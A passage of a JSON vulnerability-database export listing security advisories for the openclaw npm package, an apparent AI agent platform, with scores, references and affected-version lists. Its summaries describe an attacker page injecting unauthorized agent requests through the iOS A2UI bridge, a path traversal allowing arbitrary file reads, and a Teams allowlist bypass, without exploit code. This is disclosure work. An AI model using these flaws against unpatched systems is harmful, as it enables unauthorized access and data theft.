                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"
                }
            ],
            "aliases": [
                "CVE-2026-35634",
                "GHSA-6mqc-jqh6-x8fc"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v91b-1nmx-ckcx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89840?format=api",
            "vulnerability_id": "VCID-v9cd-65tf-p3f8",
            "summary": "OpenClaw: iOS A2UI bridge trusted generic local-network pages for agent.request dispatch\n## Summary\nBefore OpenClaw 2026.4.2, the iOS A2UI bridge treated generic local-network pages as trusted bridge origins. A page loaded from a local-network or tailnet host could trigger agent.request dispatch without the stricter trusted-canvas origin check.\n\n## Impact\nA loaded attacker-controlled page could inject unauthorized non-owner agent.request runs into the active iOS node session, polluting session state and consuming budget. The demonstrated impact did not include owner-only actions or arbitrary host execution.\n\n## Affected Packages / Versions\n- Package: openclaw (npm)\n- Affected versions: <= 2026.4.1\n- Patched versions: >= 2026.4.2\n- Latest published npm version: 2026.4.1\n\n## Fix Commit(s)\n49d08382a90f71dabe2877b3f6729ad85f808d57 — restrict A2UI action dispatch to trusted canvas URLs\n\n## Release Process Note\nThe fix is present on main and is staged for OpenClaw 2026.4.2. Publish this advisory after the 2026.4.2 npm release is live.\n\nThanks [@nexrin](https://github.com/nexrin) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41398",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00689",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "7e-05",
                            "scoring_system": "epss",
                            "scoring_elements": "0.00688",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41398"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/49d08382a90f71dabe2877b3f6729ad85f808d57"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4p4f-fc8q-84m3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41398",
                    "reference_id": "CVE-2026-41398",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41398"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-4p4f-fc8q-84m3",
                    "reference_id": "GHSA-4p4f-fc8q-84m3",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-4p4f-fc8q-84m3"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41398",
                "GHSA-4p4f-fc8q-84m3"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9cd-65tf-p3f8"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89738?format=api",
            "vulnerability_id": "VCID-vktg-77tu-vycv",
            "summary": "OpenClaw: Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n## Summary\nPath traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 ACP dispatch still reads attachment paths outside the guarded attachment-cache or root checks, and the root-enforcement fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d` — 2026-03-30T14:04:02+01:00\n\nOpenClaw thanks @north-echo for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-58q2-7r52-jq62",
                    "reference_id": "GHSA-58q2-7r52-jq62",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-58q2-7r52-jq62"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-58q2-7r52-jq62"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vktg-77tu-vycv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91432?format=api",
            "vulnerability_id": "VCID-vm8g-hrvu-quhm",
            "summary": "OpenClaw: MS Teams Feedback Invocation Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n## Summary\n\nMS Teams Feedback Invoke Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMicrosoft Teams feedback invokes previously bypassed sender authorization and could record feedback or trigger reflection for unauthorized senders. Commit `c5415a474bb085404c20f8b312e436997977b1ea` applies the same DM and group authorization checks to feedback invokes.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c5415a474bb085404c20f8b312e436997977b1ea`.\n\n## Fix Commit(s)\n\n- `c5415a474bb085404c20f8b312e436997977b1ea`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35654",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12423",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12387",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0004",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12424",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35654"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
